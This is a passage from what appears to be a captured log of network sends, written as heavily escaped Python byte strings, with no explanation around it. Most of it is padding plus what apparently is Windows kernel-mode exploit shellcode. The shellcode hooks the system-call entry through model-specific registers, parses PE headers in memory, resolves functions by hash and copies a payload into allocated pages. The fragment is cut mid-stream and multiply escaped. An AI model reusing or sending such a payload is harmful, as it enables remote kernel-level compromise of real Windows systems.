\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\
\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 
\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\
x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR
\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\
x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\
\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\
\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 7, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\
\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\